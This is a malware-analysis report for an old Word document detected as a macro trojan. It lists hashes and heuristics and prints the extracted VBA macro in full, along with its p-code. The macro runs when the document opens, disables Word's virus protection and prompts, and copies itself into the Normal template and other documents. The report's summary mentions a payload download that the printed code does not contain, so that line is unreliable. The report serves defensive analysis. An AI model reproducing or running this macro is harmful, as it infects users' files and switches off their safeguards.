Office (OLE) malware analysis — malicious · 35aacf6b7f046192

MALICIOUS

Office (OLE)

33.0 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 46f7021360c3e1f97a1677aef5b07849 SHA-1: b30201f9ffaf6cfd3728b3b63fd361a34f94e578 SHA-256: 35aacf6b7f0461929cbb1955a3c5ac62ccc4f8700ca3b9ea6397a6837e0943f1

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro that is triggered by the Document_Open event. This macro is designed to disable macro security warnings and potentially download and execute a second-stage payload. The ClamAV detection name 'Doc.Trojan.Bptk-2' further supports its malicious nature.

Heuristics 3

ClamAV: Doc.Trojan.Bptk-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Bptk-2
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4244 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4244 bytes
SHA-256: `ee840bce7702233b855f0c65c095641403223fa88708f340f7affb5f0d242592`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() 'D ' ' On Error Resume Next Application.EnableCancelKey = 0 With Options: .ConfirmConversions = 0 .SaveNormalPrompt = 0 .VirusProtection = 0 End With Set N = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule Set A = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule If N.Lines(4, 1) <> "'" Then N.DeleteLines 1, N.CountOfLines N.AddFromstring A.Lines(1, A.CountOfLines) NormalTemplate.Save GoTo 30 ElseIf A.Lines(4, 1) <> "'" Then A.DeleteLines 1, A.CountOfLines A.AddFromstring N.Lines(1, N.CountOfLines) ActiveDocument.Save End If Randomize If Rnd < 0.2 Then MsgBox "ß å..ëñÿ ñ ýòîé êíîïêîé," MsgBox "Òû å..èñü ïîíàæèìàé !" GoTo 20 End If If Rnd < 0.1 Then MsgBox "Êàê ÿ ¸..ñÿ ñ ýòîé êíîïêîé," MsgBox "Ïîå..èñü òåïåðü è òû !" End If 20 If Rnd < 0.1 Then MsgBox "John ÁÃÒÓ Áðÿíñê 2001 ã. (â îòâåò ÁÏÒÊàì)": GoTo 30 30 End Sub ' Processing file: /opt/analyzer/scan_staging/6c0d2763a2514a1d92c9ce713639f1c1.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 2677 bytes ' Line #0: ' FuncDefn (Private Sub Document_Open()) ' Line #1: ' QuoteRem 0x0000 0x0001 "D" ' Line #2: ' QuoteRem 0x0000 0x0000 "" ' Line #3: ' QuoteRem 0x0000 0x0000 "" ' Line #4: ' OnError (Resume Next) ' Line #5: ' LitDI2 0x0000 ' Ld Application ' MemSt EnableCancelKey ' Line #6: ' StartWithExpr ' Ld Options ' With ' BoS 0x0000 ' Line #7: ' LitDI2 0x0000 ' MemStWith ConfirmConversions ' Line #8: ' LitDI2 0x0000 ' MemStWith SaveNormalPrompt ' Line #9: ' LitDI2 0x0000 ' MemStWith VirusProtection ' Line #10: ' EndWith ' Line #11: ' SetStmt ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' Set N ' Line #12: ' SetStmt ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' Set A ' Line #13: ' LitDI2 0x0004 ' LitDI2 0x0001 ' Ld N ' ArgsMemLd Lines 0x0002 ' LitStr 0x0001 "'" ' Ne ' IfBlock ' Line #14: ' LitDI2 0x0001 ' Ld N ' MemLd CountOfLines ' Ld N ' ArgsMemCall DeleteLines 0x0002 ' Line #15: ' LitDI2 0x0001 ' Ld A ' MemLd CountOfLines ' Ld A ' ArgsMemLd Lines 0x0002 ' Ld N ' ArgsMemCall AddFromstring 0x0001 ' Line #16: ' Ld NormalTemplate ' ArgsMemCall Save 0x0000 ' Line #17: ' GoTo 30 ' Line #18: ' LitDI2 0x0004 ' LitDI2 0x0001 ' Ld A ' ArgsMemLd Lines 0x0002 ' LitStr 0x0001 "'" ' Ne ' ElseIfBlock ' Line #19: ' LitDI2 0x0001 ' Ld A ' MemLd CountOfLines ' Ld A ' ArgsMemCall DeleteLines 0x0002 ' Line #20: ' LitDI2 0x0001 ' Ld N ' MemLd CountOfLines ' Ld N ' ArgsMemLd Lines 0x0002 ' Ld A ' ArgsMemCall AddFromstring 0x0001 ' Line #21: ' Ld ActiveDocument ' ArgsMemCall Save 0x0000 ' Line #22: ' EndIfBlock ' Line #23: ' ArgsCall Read 0x0000 ' Line #24: ' Ld Rnd ' LitR8 0x999A 0x9999 0x9999 0x3FC9 ' Lt ' IfBlock ' Line #25: ' LitStr 0x0018 "ß å..ëñÿ ñ ýòîé êíîïêîé," ' ArgsCall MsgBox 0x0001 ' Line #26: ' LitStr 0x0015 "Òû å..èñü ïîíàæèìàé !" ' ArgsCall MsgBox 0x0001 ' Line #27: ' GoTo 20 ' Line #28: ' EndIfBlock ' Line #29: ' Ld Rnd ' LitR8 0x999A 0x9999 0x9999 0x3FB9 ' Lt ' IfBlock ' Line #30: ' LitStr 0x001B "Êàê ÿ ¸..ñÿ ñ ýòîé êíîïêîé," ' ArgsCall MsgBox 0x0001 ' Line #31: ' LitStr 0x0016 "Ïîå..èñü òåïåðü è òû !" ' ArgsCall MsgBox 0x0001 ' Line #32: ' EndIfBlock ' Line #33: ' LineNum 20 ' Ld Rnd ' LitR8 0x999A 0x9999 0x9999 0x3FB9 ' Lt ' If ' BoSImplicit ' LitStr 0x002B "John ÁÃÒÓ Áðÿíñê 2001 ã. (â îòâåò ÁÏÒÊàì)" ' ArgsCall MsgBox 0x0001 ' BoS 0x0000 ' GoTo 30 ' EndIf ' Line #34: ' LineNum 30 ' EndSub

SHA-256: ee840bce7702233b855f0c65c095641403223fa88708f340f7affb5f0d242592

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'D
'
'
On Error Resume Next
Application.EnableCancelKey = 0
With Options:
.ConfirmConversions = 0
.SaveNormalPrompt = 0
.VirusProtection = 0
End With
Set N = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
Set A = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
If N.Lines(4, 1) <> "'" Then
N.DeleteLines 1, N.CountOfLines
N.AddFromstring A.Lines(1, A.CountOfLines)
NormalTemplate.Save
GoTo 30
ElseIf A.Lines(4, 1) <> "'" Then
A.DeleteLines 1, A.CountOfLines
A.AddFromstring N.Lines(1, N.CountOfLines)
ActiveDocument.Save
End If
Randomize
If Rnd < 0.2 Then
MsgBox "ß å..ëñÿ ñ ýòîé êíîïêîé,"
MsgBox "Òû å..èñü ïîíàæèìàé !"
GoTo 20
End If
If Rnd < 0.1 Then
MsgBox "Êàê ÿ ¸..ñÿ ñ ýòîé êíîïêîé,"
MsgBox "Ïîå..èñü òåïåðü è òû !"
End If
20 If Rnd < 0.1 Then MsgBox "John  ÁÃÒÓ  Áðÿíñê 2001 ã. (â îòâåò ÁÏÒÊàì)": GoTo 30
30 End Sub

' Processing file: /opt/analyzer/scan_staging/6c0d2763a2514a1d92c9ce713639f1c1.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 2677 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	QuoteRem 0x0000 0x0001 "D"
' Line #2:
' 	QuoteRem 0x0000 0x0000 ""
' Line #3:
' 	QuoteRem 0x0000 0x0000 ""
' Line #4:
' 	OnError (Resume Next) 
' Line #5:
' 	LitDI2 0x0000 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #6:
' 	StartWithExpr 
' 	Ld Options 
' 	With 
' 	BoS 0x0000 
' Line #7:
' 	LitDI2 0x0000 
' 	MemStWith ConfirmConversions 
' Line #8:
' 	LitDI2 0x0000 
' 	MemStWith SaveNormalPrompt 
' Line #9:
' 	LitDI2 0x0000 
' 	MemStWith VirusProtection 
' Line #10:
' 	EndWith 
' Line #11:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	Set N 
' Line #12:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	Set A 
' Line #13:
' 	LitDI2 0x0004 
' 	LitDI2 0x0001 
' 	Ld N 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0001 "'"
' 	Ne 
' 	IfBlock 
' Line #14:
' 	LitDI2 0x0001 
' 	Ld N 
' 	MemLd CountOfLines 
' 	Ld N 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #15:
' 	LitDI2 0x0001 
' 	Ld A 
' 	MemLd CountOfLines 
' 	Ld A 
' 	ArgsMemLd Lines 0x0002 
' 	Ld N 
' 	ArgsMemCall AddFromstring 0x0001 
' Line #16:
' 	Ld NormalTemplate 
' 	ArgsMemCall Save 0x0000 
' Line #17:
' 	GoTo 30 
' Line #18:
' 	LitDI2 0x0004 
' 	LitDI2 0x0001 
' 	Ld A 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0001 "'"
' 	Ne 
' 	ElseIfBlock 
' Line #19:
' 	LitDI2 0x0001 
' 	Ld A 
' 	MemLd CountOfLines 
' 	Ld A 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #20:
' 	LitDI2 0x0001 
' 	Ld N 
' 	MemLd CountOfLines 
' 	Ld N 
' 	ArgsMemLd Lines 0x0002 
' 	Ld A 
' 	ArgsMemCall AddFromstring 0x0001 
' Line #21:
' 	Ld ActiveDocument 
' 	ArgsMemCall Save 0x0000 
' Line #22:
' 	EndIfBlock 
' Line #23:
' 	ArgsCall Read 0x0000 
' Line #24:
' 	Ld Rnd 
' 	LitR8 0x999A 0x9999 0x9999 0x3FC9 
' 	Lt 
' 	IfBlock 
' Line #25:
' 	LitStr 0x0018 "ß å..ëñÿ ñ ýòîé êíîïêîé,"
' 	ArgsCall MsgBox 0x0001 
' Line #26:
' 	LitStr 0x0015 "Òû å..èñü ïîíàæèìàé !"
' 	ArgsCall MsgBox 0x0001 
' Line #27:
' 	GoTo 20 
' Line #28:
' 	EndIfBlock 
' Line #29:
' 	Ld Rnd 
' 	LitR8 0x999A 0x9999 0x9999 0x3FB9 
' 	Lt 
' 	IfBlock 
' Line #30:
' 	LitStr 0x001B "Êàê ÿ ¸..ñÿ ñ ýòîé êíîïêîé,"
' 	ArgsCall MsgBox 0x0001 
' Line #31:
' 	LitStr 0x0016 "Ïîå..èñü òåïåðü è òû !"
' 	ArgsCall MsgBox 0x0001 
' Line #32:
' 	EndIfBlock 
' Line #33:
' 	LineNum 20 
' 	Ld Rnd 
' 	LitR8 0x999A 0x9999 0x9999 0x3FB9 
' 	Lt 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x002B "John  ÁÃÒÓ  Áðÿíñê 2001 ã. (â îòâåò ÁÏÒÊàì)"
' 	ArgsCall MsgBox 0x0001 
' 	BoS 0x0000 
' 	GoTo 30 
' 	EndIf 
' Line #34:
' 	LineNum 30 
' 	EndSub

Open this report in the interactive analyzer, or submit your own file for analysis.